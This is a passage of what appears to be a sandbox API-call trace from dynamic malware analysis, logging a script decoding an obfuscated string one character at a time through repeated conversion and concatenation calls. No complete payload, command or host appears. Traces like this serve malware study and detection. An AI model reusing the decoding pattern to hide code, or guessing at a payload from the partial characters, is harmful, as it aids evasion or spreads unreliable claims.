pvarResult=0x28f434) returned 0x0 [0084.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.578] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.579] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.579] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.580] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.580] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.580] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.581] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.581] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.582] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.582] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.583] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.584] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.585] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.585] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0084.586] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0084.586] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.586] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.587] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.587] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.587] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.588] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.588] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.589] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.589] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.590] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.590] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.591] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.591] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…", lpUsedDefaultChar=0x0) returned 1 [0084.592] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.592] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.592] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.593] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="M", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M", lpUsedDefaultChar=0x0) returned 1 [0084.651] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="@", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr="@") returned 1 [0084.652] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.652] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.652] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.653] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.653] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.654] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.654] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.655] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.655] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.655] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.655] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.656] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.656] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.657] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.657] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.658] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.658] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e", lpUsedDefaultChar=0x0) returned 1 [0084.658] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.659] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.659] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.659] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.660] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.660] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.661] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.662] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83", lpUsedDefaultChar=0x0) returned 1 [0084.662] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0084.663] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o", lpUsedDefaultChar=0x0) returned 1 [0084.663] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.664] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.664] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3ef0c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.665] VarCat (in: pvarLeft=0x28f538, pvarRight=0x28f68c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="M", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M", lpUsedDefaultChar=0x0) returned 1 [0084.665] VarSub (in: pvarLeft=0x28f598, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="@", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr="@") returned 1 [0084.666] VarCat (in: pvarLeft=0x28f4cc, pvarRight=0x28f5dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.666] VarSub (in: pvarLeft=0x28f598, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.667] VarCat (in: pvarLeft=0x28f4cc, pvarRight=0x28f5dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…", lpUsedDefaultChar=0x0) returned 1 [0084.667] VarSub (in: pvarLeft=0x28f598, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.667] VarCat (in: pvarLeft=0x28f4cc, pvarRight=0x28f5dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.668] VarSub (in: pvarLeft=0x28f598, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4aa14, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.668] VarCat (in: pvarLeft=0x28f4cc, pvarRight=0x28f5dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.669] VarSub (in: pvarLeft=0x28f598, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a974, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.669] VarCat (in: pvarLeft=0x28f4cc, pvarRight=0x28f5dc, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, 